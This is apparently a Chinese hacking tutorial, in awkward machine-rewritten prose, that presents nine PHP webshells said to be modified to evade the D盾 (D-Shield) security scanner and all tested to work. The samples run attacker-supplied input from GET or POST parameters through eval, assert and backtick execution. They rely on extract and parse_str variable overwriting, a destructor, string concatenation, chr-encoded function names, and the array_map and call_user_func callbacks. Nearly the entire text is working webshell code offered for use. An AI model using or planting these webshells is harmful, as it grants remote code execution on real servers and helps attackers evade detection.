今日给大伙儿产生的黑客教程是过d盾的webshell木马病毒共享与分析，期待对做网站渗透测试的盆友有协助，不聊聊天，下边刚开始实例教程。近期在检测全过程中碰到了D盾，悲惨的发觉全部过D盾的webshell都被杀毒了。因而就在 *** 上检索了一些以前能够 过D盾的shell，随后将其干了一些形变（有一些shell沒有变更），使其能够 过D盾。此次一共无私奉献上9个可过D盾的shell，所有测试可过。

0x01 extract 自变量遮盖过D盾

<?php  $a=1;$b=$_POST;extract($b);print_r(`$a`)?>

0x02 parse_str 自变量遮盖过D盾

<?php  $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`)?>

0x03 __destruct 析构函数过D盾

<?php 

class User
{
  public $name = '';

  function __destruct(){
    eval("$this->name");
  }
}

$user = new User;
$user->name = ''.$_POST['name'];
?>

教你怎样过D盾的webshell木马病毒

教你怎样过D盾的webshell木马病毒  0x04 null 拼凑过D盾

<?php

$name = $_GET['name'];

$name1=$name2= null;

eval($name1.$name2.$name);

?>

0x05 '' 拼凑过D盾

<?php

$name = $_GET['name'];

$name1=$name2= '';

eval($name1.$name2.$name);

?>

0x06 '' null 拼凑过D盾

<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);

?>

0x07 array_map函数过D盾

<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>

0x08 call_user_func_array涵数过D盾

<?php

function a(){
     return 'assert';
}
$a=a();
$aa = array($_GET['x']);
call_user_func_array($a,$a=$aa);
?>

0x09 call_user_func涵数过D盾

<?php
function a(){
     return 'assert';
}
$a=a();
$aa=$_GET['x'];
call_user_func($a,$a=$aa);
?>